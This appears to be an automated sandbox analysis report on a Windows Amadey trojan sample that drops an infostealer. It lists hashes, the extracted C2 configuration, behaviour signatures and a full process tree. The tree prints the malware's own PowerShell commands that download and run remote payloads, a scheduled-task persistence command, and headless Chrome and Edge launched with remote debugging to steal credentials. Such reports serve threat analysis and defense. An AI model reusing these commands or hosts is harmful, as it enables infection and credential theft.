Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
06/04/2025, 21:54
General
-
Target
2025-04-06_955b4aed3ce418968e83f19d40f2bbfc_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
955b4aed3ce418968e83f19d40f2bbfc
-
SHA1
d2a701c0383467b6272af994ee7d8bf05547d40a
-
SHA256
0701becbee63ab67752774b2abff998744488f66f11a2d9e6d1f5da4feed11c0
-
SHA512
c2531f6a5bc8ec53ed38ec46ccb67c822c93d81d279acea8b9d0e1ce6caa90fe617f76fd34385a12b328201040d07c66d993f250556e34769aae865f43073583
-
SSDEEP
24576:wqDEvCTbMWu7rQYlBQcBiT6rprG8a0au:wTvC/MTQYxsWR7a0a
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://176.113.115.7/mine/random.exe
Extracted
Family
amadey
Version
5.21
Botnet
092155
C2
http://176.113.115.6
Attributes
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
rc4.plain
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
-
Blocklisted process makes network request 14 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Downloads MZ/PE file 2 IoCs
-
Uses browser remote debugging 2 TTPs 16 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 11 IoCs
-
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 46 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 9 IoCs
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 9 IoCs
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 5 IoCs
-
Modifies registry class 3 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 9 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-06_955b4aed3ce418968e83f19d40f2bbfc_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-06_955b4aed3ce418968e83f19d40f2bbfc_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn AvHp3manKKW /tr "mshta C:\Users\Admin\AppData\Local\Temp\ItysWLolg.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn AvHp3manKKW /tr "mshta C:\Users\Admin\AppData\Local\Temp\ItysWLolg.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\ItysWLolg.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'C3RDAMV1DHCKWXVLECF5Q7M6RS90AWBD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\TempC3RDAMV1DHCKWXVLECF5Q7M6RS90AWBD.EXE"C:\Users\Admin\AppData\Local\TempC3RDAMV1DHCKWXVLECF5Q7M6RS90AWBD.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10479800141\pDmELXs.ps1"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -win Hidden -Command "Invoke-Command -ScriptBlock ([scriptblock]::Create((Invoke-RestMethod -Uri 'https://client-telemetry.com/hH773j/payload/fickle/payload.ps1')))"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Fickle Stealer\Browser Data\program.exe"C:\Users\Admin\AppData\Local\Temp\Fickle Stealer\Browser Data\program.exe"8⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe9⤵
- Kills process with taskkill
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"9⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff822c9dcf8,0x7ff822c9dd04,0x7ff822c9dd1010⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1976,i,8644572815227910848,17405796278053865382,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1968 /prefetch:210⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2236,i,8644572815227910848,17405796278053865382,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2232 /prefetch:310⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2480,i,8644572815227910848,17405796278053865382,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2476 /prefetch:810⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,8644572815227910848,17405796278053865382,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3216 /prefetch:110⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,8644572815227910848,17405796278053865382,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3184 /prefetch:110⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4272,i,8644572815227910848,17405796278053865382,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4264 /prefetch:210⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3844,i,8644572815227910848,17405796278053865382,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4568 /prefetch:110⤵
- Uses browser remote debugging
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe9⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe9⤵
- Kills process with taskkill
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"9⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2fc,0x7ff82024f208,0x7ff82024f214,0x7ff82024f22010⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2252,i,15248546523472009731,13363083055429072283,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:210⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2284,i,15248546523472009731,13363083055429072283,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:310⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2592,i,15248546523472009731,13363083055429072283,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2588 /prefetch:810⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3556,i,15248546523472009731,13363083055429072283,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:110⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3576,i,15248546523472009731,13363083055429072283,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:110⤵
- Uses browser remote debugging
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe9⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe"C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\onefile_3944_133884501110062000\ZSoeRVBe.exeC:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yozufqys\yozufqys.cmdline"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5649.tmp" "c:\Users\Admin\AppData\Local\Temp\yozufqys\CSC36630D1E4AC14CAC9F4D45E174B0FD8.TMP"8⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- outlook_office_path
- outlook_win_path
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe--restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ff822f7f208,0x7ff822f7f214,0x7ff822f7f2209⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2620,i,6228814623501308264,14406852862199762214,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:39⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2588,i,6228814623501308264,14406852862199762214,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:29⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2640,i,6228814623501308264,14406852862199762214,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2648 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3392,i,6228814623501308264,14406852862199762214,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3380 /prefetch:19⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3404,i,6228814623501308264,14406852862199762214,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3396 /prefetch:19⤵
- Uses browser remote debugging
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe--restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff823d5dcf8,0x7ff823d5dd04,0x7ff823d5dd109⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2524,i,12861916850798997527,13256094876139057129,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2520 /prefetch:39⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2428,i,12861916850798997527,13256094876139057129,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2420 /prefetch:29⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2560,i,12861916850798997527,13256094876139057129,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2552 /prefetch:89⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,12861916850798997527,13256094876139057129,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3168 /prefetch:19⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,12861916850798997527,13256094876139057129,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3200 /prefetch:19⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4184,i,12861916850798997527,13256094876139057129,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4180 /prefetch:29⤵
- Uses browser remote debugging
-
-
